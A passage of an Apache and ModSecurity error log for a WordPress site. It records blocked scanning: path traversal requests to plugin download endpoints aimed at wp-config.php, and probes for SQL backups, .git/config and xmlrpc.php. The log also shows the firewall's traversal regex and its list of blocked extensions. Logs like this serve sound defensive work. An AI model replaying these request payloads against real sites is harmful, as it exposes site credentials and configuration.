"/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZBJW6qAJZhzAZ_4cSj79VwAAAMM"] [Wed Mar 15 18:46:56.500107 2023] [:error] [pid 14883:tid 140038373320448] [client 20.2.81.198:39856] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZBJY8JKxLzXHW3nhk4-CHAAAAI0"] [Wed Mar 15 18:55:41.131448 2023] [:error] [pid 15315:tid 140038314571520] [client 20.2.81.198:40152] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZBJa_aAJZhzAZ_4cSj79vAAAANQ"] [Wed Mar 15 22:10:26.740754 2023] [:error] [pid 15315:tid 140038415283968] [client 5.188.62.174:47490] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBKIoqAJZhzAZ_4cSj4B9wAAAMg"] [Thu Mar 16 03:07:18.600486 2023] [ssl:warn] [pid 18040:tid 140527381641088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 03:07:18.711733 2023] [ssl:warn] [pid 18041:tid 140527381641088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 03:07:19.178045 2023] [ssl:warn] [pid 18041:tid 140527381641088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 03:07:21.654444 2023] [ssl:warn] [pid 18041:tid 140527381641088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 03:07:23.843173 2023] [ssl:warn] [pid 18456:tid 140216793405312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 03:07:23.955153 2023] [ssl:warn] [pid 18457:tid 140216793405312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 05:43:32.745762 2023] [autoindex:error] [pid 18480:tid 140216471885568] [client 45.117.170.161:43832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Mar 16 05:57:52.633060 2023] [:error] [pid 18480:tid 140216480278272] [client 5.188.62.26:44354] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBL2MCMadSR2Gbos2ypgHAAAAEc"] [Thu Mar 16 11:08:26.892415 2023] [autoindex:error] [pid 18481:tid 140216463492864] [client 20.85.233.201:56546] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 16 19:04:27.422087 2023] [ssl:warn] [pid 18457:tid 140216793405312] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 16 19:45:12.801230 2023] [autoindex:error] [pid 5068:tid 140216421529344] [client 51.210.176.212:42228] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com/css/index.php [Thu Mar 16 20:47:25.275486 2023] [autoindex:error] [pid 5068:tid 140216387958528] [client 91.134.248.253:46002] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Mar 16 23:56:46.791536 2023] [:error] [pid 5068:tid 140216604391168] [client 108.167.164.23:58756] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: http://simplesite.com [Fri Mar 17 00:07:19.951795 2023] [autoindex:error] [pid 5154:tid 140216362780416] [client 20.14.161.248:59290] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 17 03:28:21.313453 2023] [ssl:warn] [pid 13272:tid 140552479672192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 03:28:21.450816 2023] [ssl:warn] [pid 13273:tid 140552479672192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 03:28:21.809551 2023] [ssl:warn] [pid 13273:tid 140552479672192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 03:28:23.722580 2023] [ssl:warn] [pid 13273:tid 140552479672192] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 03:28:25.957784 2023] [ssl:warn] [pid 13717:tid 140327520397184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 03:28:26.065538 2023] [ssl:warn] [pid 13718:tid 140327520397184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 17 10:21:02.769828 2023] [:error] [pid 13739:tid 140327201511168] [client 5.188.62.174:52992] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBSFXnFXPnDgfnTNaxbWjAAAAEg"] [Fri Mar 17 10:22:53.755618 2023] [:error] [pid 14039:tid 140327339775744] [client 191.37.59.172:53068] [client 191.37.59.172] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBSFzYZrRhfdJdtA8iV6SwAAAMA"] [Fri Mar 17 11:07:54.173118 2023] [autoindex:error] [pid 14039:tid 140327167940352] [client 172.177.212.11:56424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 17 11:55:00.492425 2023] [:error] [pid 13740:tid 140327075620608] [client 5.188.62.174:59622] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBSbZHOkvNVP5YiRWe8ZNgAAAJc"] [Fri Mar 17 15:01:02.485006 2023] [autoindex:error] [pid 13739:tid 140327151154944] [client 20.7.133.62:44474] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 17 15:04:40.831732 2023] [:error] [pid 14039:tid 140327235081984] [client 103.133.214.139:44660] [client 103.133.214.139] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "113"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/widgets/blog.php"] [unique_id "ZBTH2IZrRhfdJdtA8iWDtQAAAMQ"] [Fri Mar 17 16:08:24.599323 2023] [autoindex:error] [pid 14039:tid 140327084013312] [client 74.235.174.225:48752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 17 17:30:49.169300 2023] [:error] [pid 13740:tid 140327075620608] [client 5.188.62.174:54370] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBTqGXOkvNVP5YiRWe8f5wAAAJc"] [Fri Mar 17 18:07:54.092542 2023] [:error] [pid 13740:tid 140327209903872] [client 5.188.62.174:57144] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBTyynOkvNVP5YiRWe8gqgAAAIc"] [Fri Mar 17 18:10:36.111734 2023] [:error] [pid 14039:tid 140327193118464] [client 113.181.83.31:57574] [client 113.181.83.31] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBTzbIZrRhfdJdtA8iWKLAAAAMk"] [Fri Mar 17 19:06:53.561578 2023] [:error] [pid 13739:tid 140327201511168] [client 5.188.62.76:60310] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBUAnXFXPnDgfnTNaxbdPQAAAEg"] [Sat Mar 18 03:42:20.423332 2023] [ssl:warn] [pid 31823:tid 140568020481920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 03:42:20.543457 2023] [ssl:warn] [pid 31824:tid 140568020481920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 03:42:21.022821 2023] [ssl:warn] [pid 31824:tid 140568020481920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 03:42:22.721787 2023] [ssl:warn] [pid 31824:tid 140568020481920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 03:42:25.050659 2023] [ssl:warn] [pid 32364:tid 139774759204736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 03:42:25.167736 2023] [ssl:warn] [pid 32365:tid 139774759204736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 18 14:24:08.416625 2023] [:error] [pid 514:tid 139774333478656] [client 5.188.86.230:53632] [client 5.188.86.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.sql"] [unique_id "ZBYP2D0rLK_iN_oZk8Cq0wAAANU"] [Sat Mar 18 14:24:10.474722 2023] [:error] [pid 32383:tid 139774409012992] [client 5.188.86.230:53634] [client 5.188.86.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu_bak.sql"] [unique_id "ZBYP2h4lEv2o0KNIzK2hjgAAAEw"] [Sat Mar 18 14:24:12.126600 2023] [:error] [pid 32384:tid 139774467761920] [client 5.188.86.230:53636] [client 5.188.86.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu_backup.sql"] [unique_id "ZBYP3Prd5LYsss69d4YhUgAAAIU"] [Sat Mar 18 14:24:13.809980 2023] [:error] [pid 32384:tid 139774578583296] [client 5.188.86.230:53638] [client 5.188.86.230] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZBYP3frd5LYsss69d4YhUwAAAIA"] [Sun Mar 19 03:25:24.282899 2023] [ssl:warn] [pid 1440:tid 139958339659648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 03:25:24.399965 2023] [ssl:warn] [pid 1441:tid 139958339659648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 03:25:25.145552 2023] [ssl:warn] [pid 1441:tid 139958339659648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 03:25:27.570674 2023] [ssl:warn] [pid 1441:tid 139958339659648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 03:25:31.126328 2023] [ssl:warn] [pid 1984:tid 140233653979008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 03:25:31.264927 2023] [ssl:warn] [pid 1985:tid 140233653979008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 22:32:18.956362 2023] [ssl:warn] [pid 3474:tid 140096660039552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 19 22:32:19.088571 2023] [ssl:warn] [pid 3475:tid 140096660039552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/03/20 01:35:00 [error] 3612#3612: *6036 access forbidden by rule, client: 95.142.115.27, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Mar 20 03:08:37.913372 2023] [ssl:warn] [pid 23881:tid 140654214694784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 03:08:38.069912 2023] [ssl:warn] [pid 23882:tid 140654214694784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 03:08:38.323984 2023] [ssl:warn] [pid 23882:tid 140654214694784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 03:08:39.951458 2023] [ssl:warn] [pid 23882:tid 140654214694784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 03:08:42.177796 2023] [ssl:warn] [pid 24355:tid 140695864919936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 03:08:42.284168 2023] [ssl:warn] [pid 24356:tid 140695864919936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 20 04:07:00.514806 2023] [:error] [pid 24377:tid 140695604029184] [client 5.188.62.76:42832] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBgiNGJaQErN3hn_HC9l7wAAAEE"] [Mon Mar 20 13:12:40.761319 2023] [autoindex:error] [pid 24596:tid 140695595636480] [client 192.185.83.73:37082] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Mon Mar 20 13:33:24.896794 2023] [:error] [pid 24378:tid 140695604029184] [client 5.188.62.174:38002] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBim9KQHK9SOpZ_x8W9IRgAAAIE"] [Mon Mar 20 17:50:10.162823 2023] [:error] [pid 24596:tid 140695545280256] [client 5.188.62.26:49114] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag 